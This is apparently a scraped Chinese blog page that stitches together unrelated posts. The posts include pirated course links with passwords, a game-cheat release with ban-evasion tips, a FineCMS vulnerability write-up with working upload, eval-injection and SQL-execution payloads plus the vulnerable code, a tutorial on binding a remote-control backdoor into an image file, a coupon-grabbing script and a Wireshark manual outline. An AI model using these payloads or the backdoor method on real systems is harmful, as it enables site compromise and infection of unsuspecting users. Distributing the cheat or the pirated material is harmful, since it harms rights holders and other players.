大学德语高教版本mp3格式 链接: http://pan.baidu.com/s/1kTpaKab 密码: 7cnw
基础德语入门教程mp3格式 链接: http://pan.baidu.com/s/1sj5J6YL 密码: yajk
新东方德语入门一月通 链接: http://pan.baidu.com/s/1pJGCXZH 密码: mcvn
俄语小故事175集MP3格式 链接: http://pan.baidu.com/s/1bnCXGkf 密码: nis4
实用商务俄语口语王全集MP3格式 链接: http://pan.baidu.com/s/1gd6dTC3 密码: enen
法语零基础入门音标语音 链接: http://pan.baidu.com/s/1gdIVj1L 密码: ivtg
法语入门走遍法国第一册上通关班 链接: http://pan.baidu.com/s/1jG5XPuY 密码: 5xje
新东方法语入门一月通 链接: http://pan.baidu.com/s/1bnm9odT 密码: j27n
走遍法国语音教程MP3格式 链接: http://pan.baidu.com/s/1bndfORH 密码: 5jfq
阿里郎电视台韩语视频教学 链接: http://pan.baidu.com/s/1i3nITM1 密码: 941a
标准韩语基础会话 链接: http://pan.baidu.com/s/1hqxowvE 密码: mfs8
标准韩语语音入门 链接: http://pan.baidu.com/s/1o6KcOzS 密码: cmai
崔羲秀初级韩国语 链接: http://pan.baidu.com/s/1c0cxOLq 密码: 4uiu
韩国高手会“踢的革命”教学片 链接: http://pan.baidu.com/s/1hqpgXTU 密码: h6df
韩国会话3月通 链接: http://pan.baidu.com/s/1qW616Pm 密码: zsc6
韩国外国语大学《韩国语教程》 链接: http://pan.baidu.com/s/1mgmWRrE 密码: 2u4y
韩国语课堂旅游基础会话 链接: http://pan.baidu.com/s/1mgtI0Jm 密码: mdpf
韩语口语8000字mp3格式 链接: http://pan.baidu.com/s/1bnApR5P 密码: xwu4
韩语口语900句mp3音频 链接: http://pan.baidu.com/s/1c010qru 密码: cdsu
韩语自学视频教程 链接: http://pan.baidu.com/s/1hqAL6TI 密码: ic27
老版Let’sSpeakKorean视频教学 链接: http://pan.baidu.com/s/1pJ63AUR 密码: pqnk
临时急需要马上说韩语 链接: http://pan.baidu.com/s/1sjJWInF 密码: 8q5p
零起点韩语口语入门 链接: http://pan.baidu.com/s/1pJ9RvHx 密码: gbhk
零起点韩语口语入门王视频 链接: http://pan.baidu.com/s/1gd5xVhD 密码: h7p8
民族出版社韩国语MP3格式 链接: http://pan.baidu.com/s/1i3Gjn9N 密码: w7i7
实用初级韩国语教程 链接: http://pan.baidu.com/s/1mg9r5lY 密码: dx2z
实用韩国语教程 链接: http://pan.baidu.com/s/1mgtI0JI 密码: fi3r
实用韩语单词500个 链接: http://pan.baidu.com/s/1qW9jtDU 密码: 4eyk
我为韩语狂入门篇 链接: http://pan.baidu.com/s/1qWn4Hmk 密码: ty7w
无师自通韩国语视频教程 链接: http://pan.baidu.com/s/1i3H5hhN 密码: 6mhy
新版Let’sSpeakKorean 260集视频 链接: http://pan.baidu.com/s/1mgAD3eC 密码: rd7r
新编中级韩国语MP3格式 链接: http://pan.baidu.com/s/1dD0cxNj 密码: ysxp
新东方韩语入门一月通 链接: http://pan.baidu.com/s/1c06kchE 密码: ng25
新概念韩国语视频 链接: http://pan.baidu.com/s/1kTpaKbd 密码: kpbh
中韩交流标准韩国语 链接: http://pan.baidu.com/s/1qW5fBTq 密码: sxqi
中韩交流实用韩国语 链接: http://pan.baidu.com/s/1pJusrNH 密码: ft8u
Erin挑战！学会日语视频25讲 链接: http://pan.baidu.com/s/1ntIcYnf 密码: m9bn
Go Go Japan第一季8集 链接: http://pan.baidu.com/s/1bnCXGAV 密码: h6p8
北海道漫游记 链接: http://pan.baidu.com/s/1bnrsWl5 密码: 1xa5
标准日本语 链接: http://pan.baidu.com/s/1ntABznz 密码: bsgv
标准日语初级教程 链接: http://pan.baidu.com/s/1bn4kmfl 密码: ckji
别笑！我是日语学习书MP3格式 链接: http://pan.baidu.com/s/1pJOK2uB 密码: 4h5p
超简单-手绘旅游日语MP3格式 链接: http://pan.baidu.com/s/1ntoqMTF 密码: sjrg
从日本中小学课本学日文 链接: http://pan.baidu.com/s/1jG2AaA6 密码: v1db
大家的日本语(1-2册)MP3格式 链接: http://pan.baidu.com/s/1qWoQC8k 密码: 3g8k
大学日语专业四级轻松过级一点通mp3格式 链接: http://pan.baidu.com/s/1kTDxt3L 密码: mppu
蛋蛋动漫日语学堂70讲 链接: http://pan.baidu.com/s/1gd2aibx 密码: jxn9
东京印象 链接: http://pan.baidu.com/s/1o6rC5rc 密码: k98i
读唐诗学日语汉字MP3格式 链接: http://pan.baidu.com/s/1mg3lUNQ 密码: 4a2r
短期掌握日本语能力测试N1级 链接: http://pan.baidu.com/s/1sjFSWwt 密码: b74a
疯狂日语MP3版7讲 链接: http://pan.baidu.com/s/1sjA3rAl 密码: sqvk
跟NHK学简明日语 链接: http://pan.baidu.com/s/1qW9Pw3y 密码: gt9k
沪江日语 链接: http://pan.baidu.com/s/1pJ0xUTP 密码: 9xi3
环游日本学日语 链接: http://pan.baidu.com/s/1fPIZc 密码: fete
叫醒耳朵日语会话通3000句日常日语句型 链接: http://pan.baidu.com/s/1pJiNaqf 密码: 71yd
口语及短句888个4讲MP3格式 链接: http://pan.baidu.com/s/18pZXG 密码: div3
来去日本第二季17集 链接: http://pan.baidu.com/s/1sjn2H1V 密码: 23ve
赖户内海心动之旅5集 链接: http://pan.baidu.com/s/1qWzFUI4 密码: 9feh
老外最想与你聊的100日语话题 链接: http://pan.baidu.com/s/1bfYUU 密码: xu45
日本九州北部之旅5集 链接: http://pan.baidu.com/s/1kTnERVD 密码: 817r
日本语能力测试1234级词汇背诵手册MP3版 链接: http://pan.baidu.com/s/1gdCP8zD 密码: w42w
日英双解辞典 链接: http://pan.baidu.com/s/1ntwyoZJ 密码: 7jnd
日语300句 链接: http://pan.baidu.com/s/1pJ3LK3T 密码: 7vgd
日语初级1-24集MP3格式 链接: http://pan.baidu.com/s/1mgBtz2g 密码: 8x7r
日语基础中央广播电视大学教学视频40集 链接: http://pan.baidu.com/s/1c054gBQ 密码: egjr
日语口译综合能力（二级）mp3格式 链接: http://pan.baidu.com/s/1sjsSriH 密码: uj4r
日语口语900句音频教程 链接: http://pan.baidu.com/s/1jGxQqfs 密码: q83c
日语口语王想说就说mp3格式 链接: http://pan.baidu.com/s/1eQ2cjse 密码: gyk1
日语能力考试2级听力模拟训练DOC文本MP3格式 链接: http://pan.baidu.com/s/1sjt8qC1 密码: ce8h
日语能力考试二级听力模拟训练MP3格式 链接: http://pan.baidu.com/s/1hqhFz1a 密码: gbxm
日语一月通全套教程合集 链接: http://pan.baidu.com/s/1ntl8WpN 密码: 6v1u
商务日语教程 链接: http://pan.baidu.com/s/1i3pKT4D 密码: mn42
上外新编日语答疑解难视频 链接: http://pan.baidu.com/s/1o6zJZN8 密码: n3v4
生活日语半日通 链接: http://pan.baidu.com/s/1c0tsMFA 密码: 8ukk
实用初级日语视频教程32讲 链接: http://pan.baidu.com/s/1fPIZO 密码: ev2w
实用日语口语句典MP3格式 链接: http://pan.baidu.com/s/1sj2vHST 密码: 6bmh
哇!原来这句日语这样说! 链接: http://pan.baidu.com/s/1o67l6no 密码: zmpq
无师自通日本语口语MP3格式 链接: http://pan.baidu.com/s/1ntCDtd3 密码: 5sya
现在就说日语 链接: http://pan.baidu.com/s/1c0lRrfq 密码: tc69
新版标准日本语 链接: http://pan.baidu.com/s/1sj0ZPMX 密码: fmgr
新编日语1-4册MP3格式全套 链接: http://pan.baidu.com/s/1kT3nVIB 密码: eurw
新编日语教程1-5册MP3格式 链接: http://pan.baidu.com/s/1qWOI1Uc 密码: gxs5
新编日语修订本mp3格式4册 链接: http://pan.baidu.com/s/1kTzQh3x 密码: 861q
新编生活日语视频25讲 链接: http://pan.baidu.com/s/1qWFUUq4 密码: 7ipe
新东方日语讲义 链接: http://pan.baidu.com/s/1mgy2jA4 密码: jfjc
新东方日语入门一月通 链接: http://pan.baidu.com/s/1gdvo8bL 密码: 2v9w
新东方日语一级讲座视频教程 链接: http://pan.baidu.com/s/1qWBlnC4 密码: mrtv
新概念日语视频教学15集 链接: http://pan.baidu.com/s/1g5ECe 密码: hn7j
新日本语能力测试N3词汇背诵手册mp3版 链接: http://pan.baidu.com/s/1o6A9vPS 密码: xw5p
学日语高手系列-流行口语及短句888个 链接: http://pan.baidu.com/s/1c0Er5WO 密码: 6xkt
樱花日语多媒体课程12级别 链接: http://pan.baidu.com/s/1o6qq9cu 密码: 2hfg
原来日语这样说MP3格式71讲 链接: http://pan.baidu.com/s/1dDItprb 密码: epxa
张向荣日语教程 链接: http://pan.baidu.com/s/1kTlDbbL 密码: ann5
中日交流标准日本语 链接: http://pan.baidu.com/s/1mgsw65U 密码: 6dav
走遍日本教程 链接: http://pan.baidu.com/s/1o60zW9s 密码: axh3
大学泰语听力教程 链接: http://pan.baidu.com/s/1eQ2cjvk 密码: 43v7
基础泰语MP3格式 链接: http://pan.baidu.com/s/1eQ8NOiu 密码: yhdx
实用初级泰国语视频教学 链接: http://pan.baidu.com/s/1o6zee3g 密码: n33g
泰语入门基础课程文字教程 链接: http://pan.baidu.com/s/1o6j4Znc 密码: kfam
新东方西班牙语入门一月通 链接: http://pan.baidu.com/s/1hqyAvuW 密码: j7kb
新东方新概念英语1-4册 链接: http://pan.baidu.com/s/1o6MKDPC 密码: 3ay4
新概念英语1-4册视频教程 链接: http://pan.baidu.com/s/1jGAH7JC 密码: wrsu
新概念英语精品课堂mp3格式 链接: http://pan.baidu.com/s/1bnbJUe7 密码：3ara

365天英语口语大全 链接: http://pan.baidu.com/s/1dhTF4 密码: eu3w
9小时快学国际音标 链接: http://pan.baidu.com/s/1gdEl1BX 密码: ba37
海伦从零开始英语音标 链接: http://pan.baidu.com/s/1ntkTbb7 密码: x12k
新东方4+1课堂教程 链接: http://pan.baidu.com/s/1mgxgosg 密码: 69tq
新东方王强口语全集 链接: http://pan.baidu.com/s/1sjC5hmt 密码: au3a
英语口音纠正课程 链接: http://pan.baidu.com/s/1ucP3o 密码: ygcn
英语口语8000句 链接: http://pan.baidu.com/s/1kTCHsI7  密码：9qqr

英语口语900句系列 链接: http://pan.baidu.com/s/1qWMa9u0 密码: 2t3t

更新内容：
修复第三方、客户端异常；

使用方法：
先打开逆战游戏客户端，然后打开辅助，点击辅助上的“开启”，接着登录游戏（注意：上游戏菜单卡死不能用，请重新退出游戏重新开启辅助）

注意事项：
１.用独立全屏窗口化（设置里面第一个）
２.最好上游戏不登QQ，别切出来干别的事情，如截图聊天等等。
３.PVP模式枪枪爆头请勿全程开启，否则挂得快。
４.推荐大家玩猎场只开枪枪爆头，稳定刷通宵。
５.建议玩几局就按F12键退出游戏一下，然后重新登录再玩。
请小号上游戏
下载地址：http://pan.stnts.com/s/0PnPQn2

为了避免非零基础人群感到身体不适、头晕恶心、易怒及粗口，请不要查看以下内容
↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑请不要无视黄色提示

TB购买的，分享给大家，包含安装教程、插件、主题

CMS演示 https://yfdxs.com/

博客演示 https://yfdxs.com/blog

更多详细信息请前往官方网站查询。谢谢

压缩包内容：

QQ群：385079302

点我加群

安装教程：
首先要求的是要https加密传输，也就是你域名要用https，太繁琐，可以多百度一下，论坛关于微信小程序的教程也很多，
但是从微信小程序目前发展的情况来看，还没有红到一定程度，说不定哪天就遇到了，这个不好说，大家测试把。

链接: https://pan.baidu.com/s/1nv61hXZ 密码: jvhn

0x1 Payload

0x11 任意文件上传

注册个用户，修改头像，选择一张图片马：

抓包，修改post中tx参数中的jpg为php：

getshell：

目录中的1位用户id，稍微爆破一下即可。 PS：谢谢大佬们提醒，这个uid可以直接在cookie中看到

0x12 任意代码执行

index.php?c=api&m=data2&auth=e174c30q733kceb0r4kkh5m8u3p1jnh6&param=action=cache%20name=MEMBER.1'];phpinfo();$a=['1

其中auth为：

24b16fede9a67c9251d3e7c7161c83ac的md5值

0x13 任意SQL语句执行

index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=action=sql%20sql='select%20user();'

auth值同上

0x2 代码分析

0x21 任意文件上传

/finecms/dayrui/controllers/member/Account.php 177~244

/**
 *  上传头像处理
 *  传入头像压缩包，解压到指定文件夹后删除非图片文件
 */
public function upload() {

    // 创建图片存储文件夹
    $dir = SYS_UPLOAD_PATH.'/member/'.$this->uid.'/';
    @dr_dir_delete($dir);
    !is_dir($dir) && dr_mkdirs($dir);

    if ($_POST['tx']) {
        $file = str_replace(' ', '+', $_POST['tx']);
        if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $file, $result)){
            $new_file = $dir.'0x0.'.$result[2];
            if (!@file_put_contents($new_file, base64_decode(str_replace($result[1], '', $file)))) {
                exit(dr_json(0, '目录权限不足或磁盘已满'));
            } else {
                $this->load->library('image_lib');
                $config['create_thumb'] = TRUE;
                $config['thumb_marker'] = '';
                $config['maintain_ratio'] = FALSE;
                $config['source_image'] = $new_file;
                foreach (array(30, 45, 90, 180) as $a) {
                    $config['width'] = $config['height'] = $a;
                    $config['new_image'] = $dir.$a.'x'.$a.'.'.$result[2];
                    $this->image_lib->initialize($config);
                    if (!$this->image_lib->resize()) {
                        exit(dr_json(0, '上传错误：'.$this->image_lib->display_errors()));
                        break;
                    }
                }
                list($width, $height, $type, $attr) = getimagesize($dir.'45x45.'.$result[2]);
                !$type && exit(dr_json(0, '图片字符串不规范'));
            }
        } else {

            exit(dr_json(0, '图片字符串不规范'));
        }
    } else {
        exit(dr_json(0, '图片不存在'));
    }

// 上传图片到服务器
    if (defined('UCSSO_API')) {
        $rt = ucsso_avatar($this->uid, file_get_contents($dir.'90x90.jpg'));
        !$rt['code'] && $this->_json(0, fc_lang('通信失败：%s', $rt['msg']));
    }

    exit('1');
}

不用多解释了，直接任意文件上传。。

0x22 任意代码执行&&任意SQL语句执行

先说一下auth：
config.php
$config['sess_cookie_name'] = $site['SYS_KEY'].'_ci_session';

/finecms/dayrui/controllers/Api.php

直接可以再cookie中获取。

问题其实都出在了data2()这一个函数

/finecms/dayrui/controllers/Api.php

/**
 * 自定义数据调用（新版本）
 */
public function data2() {

    $data = array();

    // 安全码认证
    $auth = $this->input->get('auth', true);
    if ($auth != md5(SYS_KEY)) {
        // 授权认证码不正确
        $data = array('msg' => '授权认证码不正确', 'code' => 0);
    } else {
        // 解析数据
        $cache = '';
        $param = $this->input->get('param');
        if (isset($param['cache']) && $param['cache']) {
            $cache = md5(dr_array2string($param));
            $data = $this->get_cache_data($cache);
        }
        if (!$data) {

            // list数据查询
            $data = $this->template->list_tag($param);
            $data['code'] = $data['error'] ? 0 : 1;
            unset($data['sql'], $data['pages']);

            // 缓存数据
            $cache && $this->set_cache_data($cache, $data, $param['cache']);
        }
    }

    // 接收参数
    $format = $this->input->get('format');
    $function = $this->input->get('function');
    if ($function) {
        if (!function_exists($function)) {
            $data = array('msg' => fc_lang('自定义函数'.$function.'不存在'), 'code' => 0);
        } else {
            $data = $function($data);
        }
    }

    // 页面输出
    if ($format == 'php') {
        print_r($data);
    } elseif ($format == 'jsonp') {
        // 自定义返回名称
        echo $this->input->get('callback', TRUE).'('.$this->callback_json($data).')';
    } else {
        // 自定义返回名称
        echo $this->callback_json($data);
    }
    exit;
}

为什么说出在了这一个函数，因为通过这个函数可以调用到其他敏感函数，本来系统封装的函数不是给用户使用的。

可以看到，传入的参数直接进了$data = $this->template->list_tag($param);，这个函数里有什么，来截一部分：

/finecms/dayrui/libraries/Template.php

switch ($system['action']) {

    case 'cache': // 系统缓存数据

        if (!isset($param['name'])) {
            return $this->_return($system['return'], 'name参数不存在');
        }

        $pos = strpos($param['name'], '.');
        if ($pos !== FALSE) {
            $_name = substr($param['name'], 0, $pos);
            $_param = substr($param['name'], $pos + 1);
        } else {
            $_name = $param['name'];
            $_param = NULL;
        }

        $cache = $this->_cache_var($_name, !$system['site'] ? SITE_ID : $system['site']);
        if (!$cache) {
            return $this->_return($system['return'], "缓存({$_name})不存在，请在后台更新缓存");
        }

        if ($_param) {
            $data = array();
            @eval('$data=$cache'.$this->_get_var($_param).';');
            if (!$data) {
                return $this->_return($system['return'], "缓存({$_name})参数不存在!!");
            }
        } else {
            $data = $cache;
        }

        return $this->_return($system['return'], $data, '');
        break;

    ...

    case 'sql': // 直接sql查询

        if (preg_match('/sql=\'(.+)\'/sU', $_params, $sql)) {

            // 数据源的选择
            $db = $this->ci->db;

            // 替换前缀
            $sql = str_replace(
                array('@#S', '@#'),
                array($db->dbprefix.$system['site'], $db->dbprefix),
                trim(urldecode($sql[1]))
            );
            if (stripos($sql, 'SELECT') !== 0) {
                return $this->_return($system['return'], 'SQL语句只能是SELECT查询语句');
            }

            $total = 0;
            $pages = '';

            // 如存在分页条件才进行分页查询
            if ($system['page'] && $system['urlrule']) {
                $page = max(1, (int)$_GET['page']);
                $row = $this->_query(preg_replace('/select \* from/iUs', 'SELECT count(*) as c FROM', $sql), $system['site'], $system['cache'], FALSE);
                $total = (int)$row['c'];
                $pagesize = $system['pagesize'] ? $system['pagesize'] : 10;
                // 没有数据时返回空
                if (!$total) {
                    return $this->_return($system['return'], '没有查询到内容', $sql, 0);
                }
                $sql.= ' LIMIT '.$pagesize * ($page - 1).','.$pagesize;
                $pages = $this->_get_pagination(str_replace('[page]', '{page}', urldecode($system['urlrule'])), $pagesize, $total);
            }

            $data = $this->_query($sql, $system['site'], $system['cache']);
            $fields = NULL;

            if ($system['module']) {
                $fields = $this->ci->module[$system['module']]['field']; // 模型主表的字段
            }

            if ($fields) {
                // 缓存查询结果
                $name = 'list-action-sql-'.md5($sql);
                $cache = $this->ci->get_cache_data($name);
                if (!$cache && is_array($data)) {
                    // 模型表的系统字段
                    $fields['inputtime'] = array('fieldtype' => 'Date');
                    $fields['updatetime'] = array('fieldtype' => 'Date');
                    // 格式化显示自定义字段内容
                    foreach ($data as $i => $t) {
                        $data[$i] = $this->ci->field_format_value($fields, $t, 1);
                    }
                    //$cache = $this->ci->set_cache_data($name, $data, $system['cache']);
                    $cache = $system['cache'] ? $this->ci->set_cache_data($name, $data, $system['cache']) : $data;
                }
                $data = $cache;
            }
            return $this->_return($system['return'], $data, $sql, $total, $pages, $pagesize);
        } else {
            return $this->_return($system['return'], '参数不正确，SQL语句必须用单引号包起来'); // 没有查询到内容
        }
        break;

    ...
}

任意SQL语句执行到这里就不用说了。

再说一下代码执行的构造

只需使$cache有返回值就可以执行eval()了了，看一下_cache_var()函数：

public function _cache_var($name, $site = SITE_ID) {

    $data = NULL;
    $name = strtoupper($name);

    switch ($name) {
        case 'MEMBER':
            $data = $this->ci->get_cache('member');
            break;
        case 'URLRULE':
            $data = $this->ci->get_cache('urlrule');
            break;
        case 'MODULE':
            $data = $this->ci->get_cache('module');
            break;
        case 'CATEGORY':
            $site = $site ? $site : SITE_ID;
            $data = $this->ci->get_cache('category-'.$site);
            break;
        default:
            $data = $this->ci->get_cache($name.'-'.$site);
            break;
    }

    return $data;
}

只需name等于其中的几个值就可以，接下来就是根据_get_var()函数构造payload了：

public function _get_var($param){

    $array = explode('.', $param);
    if (!$array) {
        return '';
    }

    $string = '';
    foreach ($array as $var) {
        $string.= '[';
        if (strpos($var, '$') === 0) {
            $string.= preg_replace('/\[(.+)\]/U', '[\'\\1\']', $var);
        } elseif (preg_match('/[A-Z_]+/', $var)) {
            $string.= ''.$var.'';
        } else {
            $string.= '\''.$var.'\'';
        }
        $string.= ']';
    }

    return $string;
}

就两个正则，稍微构造下就OK了

0x3 其他

另外这个地方，利用任意SQL语句返回$data也能造成代码执行，不分析了。

听说finecms都能申请cve了，早没看，简直是程序员开发出来给刷cve的==、

自评TCV=1

大家好，我是Lionel，今天分享一个干货教程，图片绑定后门，由于过程稍复杂，大家如果有不懂的地方请在下面留言，看到了会回复大家的。

首先我们需要几个工具。

2.远程工具

3.生成图标的网站http://www.ico.la/

操作步骤

1.    找一张图片，这里我就随便找一张图片。打开网站，我们上传一张图片。选择想要的尺寸，保存图标。

保存下来的图标，我们先放着。接下来我们设置生成后门。

2.打开远控软件。

我们现在要生成一个后门的.exe文件。

由于远控软件都不统一，我们根据自己的软件生成就可以了。

这是我生成的远控后门。

3. 然后我们用BD2.Net Injector来绑定这两个文件。

按照图示，依次添加需要的文件（前面已经都生成过了）。然后点√，生成即可。

这个就是我们生成的带有后门的图片。我们双击试试效果。

Okay，已经上线了。 

原文作者：

黑白之道

从网站第一篇文章hello world ，到至今.整整799天，第一次坚持的成果。其他的网站，都是一时兴起。随着时间的流逝，都已经没了。

经历了什么，只有自己最清楚，从第一次做网站至今已经整整5年。

每个月都至少有一篇文章更新。

我自己都不知道是怎么做到的。

从一开始的我一个人的网站，到现在，后台有261个用户数据。

随着青春的渐去，已经不再像以前那样随意去触摸法律的界限。

去年年底跟女朋友分手，至今未曾见过一面。

这也正好满足了我的心愿，分手就分的彻底。

好多兄弟都已经结婚生子成家立业。

有时候，静静的，会感觉很孤独。

但是又不想去跟那些不熟的人狂欢。

一切，都随心。

也许是因为一切随心，有时候我自己都会觉得自己脱离人群了。

到此吧。

又是一年开学季。

腾讯云学生服务器活动相信大家都知道，，，不多说了。。

活动地址：https://www.qcloud.com/act/campus

但是腾讯出了一个规则，老用户不用抢代金卷，但是新用户需要每天中午12.00去抢卷。。。

有了这个脚本后，妈妈再也不用担心我抢不到卷了。。。。

注意：脚本非原创。。。

使用教程就是需要一个有审查元素的浏览器

然后在11.57的时候右键审查元素，然后点开Console，吧代码复制进去，然后回车。。就OK、。

你需要做的就是在12.00过后去观察有卷没有。。。。。

代码如下：

//make the button click-able
$("button.button.J-gotoAuth").removeAttr("disabled");

//disable the pop-up dialog window
$("div.dialog.J-bizDialog").hide();

//repeatly trigger the button in the time interval of 400ms
function btnhack() {
    $(document).ready(function(){
        $("button.button.J-gotoAuth").trigger("click");
    });
}
// 如果你的电脑配置好点，可以尝试把400毫米间隔改为更短
setInterval("btnhack()","400");

可惜的是只有html格式的文档，没有图片资源

下载地址：http://pan.baidu.com/s/1jIyzzGM

自行保存

目录

第 1 章 介绍.............................................................................................................................................................. 4

1.1. 什么是Wireshark................................................................................................................................................ 4

1.1.1. 主要应用.................................................................................................................................................. 4

1.1.2. 特性.......................................................................................................................................................... 4

1.1.3. 捕捉多种网络接口................................................................................................................................... 5

1.1.4. 支持多种其它程序捕捉的文件................................................................................................................. 5

1.1.5. 支持多格式输出....................................................................................................................................... 5

1.1.6. 对多种协议解码提供支持........................................................................................................................ 5

1.1.7. 开源软件.................................................................................................................................................. 5

1.1.8. Wireshark不能做的事............................................................................................................................... 5

1.2. 系通需求............................................................................................................................................................ 5

1.2.1. 一般说明.................................................................................................................................................. 6

1.2.2. Microsoft Windows.................................................................................................................................... 6

1.2.3. Unix/Linux.................................................................................................................................................. 6

1.3. 从哪里可以得到Wireshark................................................................................................................................. 6

1.4. Wiresahrk简史^[6]................................................................................................................................................. 7

1.5. Wireshark开发维护............................................................................................................................................ 7

1.6. 汇报问题和获得帮助......................................................................................................................................... 7

1.6.1. 网站.......................................................................................................................................................... 7

1.6.2. 百科全书.................................................................................................................................................. 7

1.6.3. FAQ........................................................................................................................................................... 7

1.6.4. 邮件列表.................................................................................................................................................. 8

1.6.5. 报告问题.................................................................................................................................................. 8

1.6.6. 在UNIX/Linux平台追踪软件错误............................................................................................................. 8

1.6.7. 在Windows平台追踪软件错误................................................................................................................ 9

第 2 章 编译/安装Wireshark...................................................................................................................................... 10

2.1. 须知.................................................................................................................................................................. 10

2.2. 获得源............................................................................................................................................................... 10

2.3. 在UNIX下安装之前............................................................................................................................................ 10

2.4. 在UNIX下编译Wireshark................................................................................................................................... 11

2.5. 在UNIX下安装二进制包..................................................................................................................................... 12

2.5.1. 在Linux或类似环境下安装RPM包............................................................................................................ 12

2.5.2. 在Debian环境下安装Deb包.................................................................................................................... 12

2.5.3. 在Gentoo Linux环境下安装Portage........................................................................................................... 12

2.5.4. 在FreeBSD环境下安装包.......................................................................................................................... 12

2.6. 解决UNIX下安装过程中的问题 ^[10].................................................................................................................... 12

2.7. 在Windows下编译源......................................................................................................................................... 13

2.8. 在Windows下安装Wireshark.............................................................................................................................. 13

2.8.1. 安装Wireshark......................................................................................................................................... 13

2.8.2. 手动安装WinPcap..................................................................................................................................... 14

2.8.3. 更新Wireshark......................................................................................................................................... 14

2.8.4. 更新WinPcap............................................................................................................................................ 15

2.8.5. 卸载Wireshark......................................................................................................................................... 15

2.8.6. 卸载WinPcap............................................................................................................................................ 15

第 3 章 用户界面..................................................................................................................................................... 16

3.1. 须知.................................................................................................................................................................. 16

3.2. 启动Wireshark.................................................................................................................................................. 16

3.3. 主窗口.............................................................................................................................................................. 16

3.3.1. 主窗口概述............................................................................................................................................. 17

3.4. 主菜单.............................................................................................................................................................. 17

3.5. "File"菜单.......................................................................................................................................................... 18

3.6. "Edit"菜单......................................................................................................................................................... 19

3.7. "View"菜单........................................................................................................................................................ 20

3.8. "Go"菜单........................................................................................................................................................... 22

3.9. "Capture"菜单................................................................................................................................................... 23

3.10. "Analyze"菜单................................................................................................................................................. 24

3.11. "Statistics"菜单................................................................................................................................................ 25

3.12. "Help"菜单...................................................................................................................................................... 27

3.13. "Main"工具栏.................................................................................................................................................. 27

3.14. "Filter"工具栏.................................................................................................................................................. 29

3.15. "Pcaket List"面板.............................................................................................................................................. 29

3.16. "Packet Details"面板......................................................................................................................................... 30

3.17. "Packet Byte"面板............................................................................................................................................ 30

3.18. 状态栏............................................................................................................................................................ 31

第 4 章 实时捕捉数据包.......................................................................................................................................... 32

4.1. 介绍.................................................................................................................................................................. 32

4.2. 准备工作.......................................................................................................................................................... 32

4.3. 开始捕捉.......................................................................................................................................................... 32

4.4. 捕捉接口对话框............................................................................................................................................... 32

4.5. 捕捉选项对话框............................................................................................................................................... 33

4.5.1. 捕捉桢.................................................................................................................................................... 34

4.5.2. 捉数据帧为文件。.................................................................................................................................. 35

4.5.3. 停止捕捉桢............................................................................................................................................. 35

4.5.4. 显示桢选项............................................................................................................................................. 35

4.5.5. 名称解析设置......................................................................................................................................... 36

4.5.6. 按钮........................................................................................................................................................ 36

4.6. 捕捉文件格式、模式设置................................................................................................................................ 36

4.7. 链路层包头类型............................................................................................................................................... 37

4.8. 捕捉时过滤....................................................................................................................................................... 37

4.8.1. 自动过滤远程通信.................................................................................................................................. 38

4.9. 在捕捉过程中................................................................................................................................................... 38

4.9.1. 停止捕捉................................................................................................................................................. 39

4.9.2. 重新启动捕捉......................................................................................................................................... 39

第 5 章 文件输入／输出及打印............................................................................................................................... 41

5.1. 说明.................................................................................................................................................................. 41

5.2. 打开捕捉文件................................................................................................................................................... 41

5.2.1. 打开捕捉文件对话框.............................................................................................................................. 41

5.2.2. 输入文件格式......................................................................................................................................... 42

5.3. 保存捕捉包....................................................................................................................................................... 43

5.3.1. "save Capture File As/保存文件为"对话框................................................................................................ 43

5.3.2. 输出格式................................................................................................................................................. 44

5.4. 合并捕捉文件................................................................................................................................................... 45

5.4.1. 合并文件对话框..................................................................................................................................... 45

5.5. 文件集合.......................................................................................................................................................... 46

5.5.1. 文件列表对话框..................................................................................................................................... 47

5.6. 导出数据.......................................................................................................................................................... 47

5.6.1. "Export as Plain Text File"对话框............................................................................................................... 47

5.6.2. "Export as PostScript File"对话框............................................................................................................. 48

5.6.3. "Export as CSV (Comma Separated Values) File"对话框.............................................................................. 48

5.6.4. "Export as PSML File"对话框.................................................................................................................... 49

5.6.5. "Export as PDML File"对话框................................................................................................................... 49

5.6.6. "Export selected packet bytes"对话框..................................................................................................... 50

5.6.7. "Export Objects"对话框.......................................................................................................................... 50

5.7. 打印包.............................................................................................................................................................. 51

5.7.1. 打印 对话框........................................................................................................................................... 51

5.8. 包范围选项....................................................................................................................................................... 52

5.9. 包格式选项....................................................................................................................................................... 53

第 6 章 处理已经捕捉的包...................................................................................................................................... 54

6.1. 浏览您捕捉的包............................................................................................................................................... 54

6.2. 弹出菜单项....................................................................................................................................................... 55

6.2.1. 包列表面板的弹出菜单.......................................................................................................................... 55

6.2.2. 包详情面板的弹出菜单.......................................................................................................................... 56

6.3. 浏览时过滤包................................................................................................................................................... 57

6.4. 建立显示过滤表达式........................................................................................................................................ 58

6.4.1. 显示过滤字段......................................................................................................................................... 58

6.4.2. 比较值.................................................................................................................................................... 59

6.4.3. 组合表达式............................................................................................................................................. 59

6.4.4. 常见的错误............................................................................................................................................. 60

6.5. “Filter Expression/过滤表达式”对话框............................................................................................................. 60

6.6. 定义，保存过滤器........................................................................................................................................... 61

6.7. 查找包.............................................................................................................................................................. 62

6.7.1. 查找包对话框......................................................................................................................................... 62

6.7.2. "Find Next/查找下一个"命令................................................................................................................... 63

6.7.3. "Find Previous/查找上一个"命令............................................................................................................. 63

6.8. 到指定的包....................................................................................................................................................... 63

6.8.1. "GO Back"返回命令................................................................................................................................. 63

6.8.2. "Go Forward /向前"命令.......................................................................................................................... 63

6.8.3. "Go to Packet/到指定的包"对话框.......................................................................................................... 63

6.8.4. "Go to Corresponding Packet/到对应的包"命令....................................................................................... 63

6.8.5. "Go to Firest Packet/到第一个包"命令..................................................................................................... 64

6.8.6. "Go to Last Packet/到最后一个包"命令.................................................................................................... 64

6.9. 标记包.............................................................................................................................................................. 64

6.10. 时间显示格式及参考时间.............................................................................................................................. 64

6.10.1. 包参考时间........................................................................................................................................... 64

第 7 章 高级............................................................................................................................................................. 66

7.1. 说明.................................................................................................................................................................. 66

7.2. "Follow TCP Stream"............................................................................................................................................ 66

7.2.1. "Follow TCP Stream"对话框....................................................................................................................... 66

7.3. 时间戳.............................................................................................................................................................. 67

7.3.1. Wireshark内置........................................................................................................................................ 67

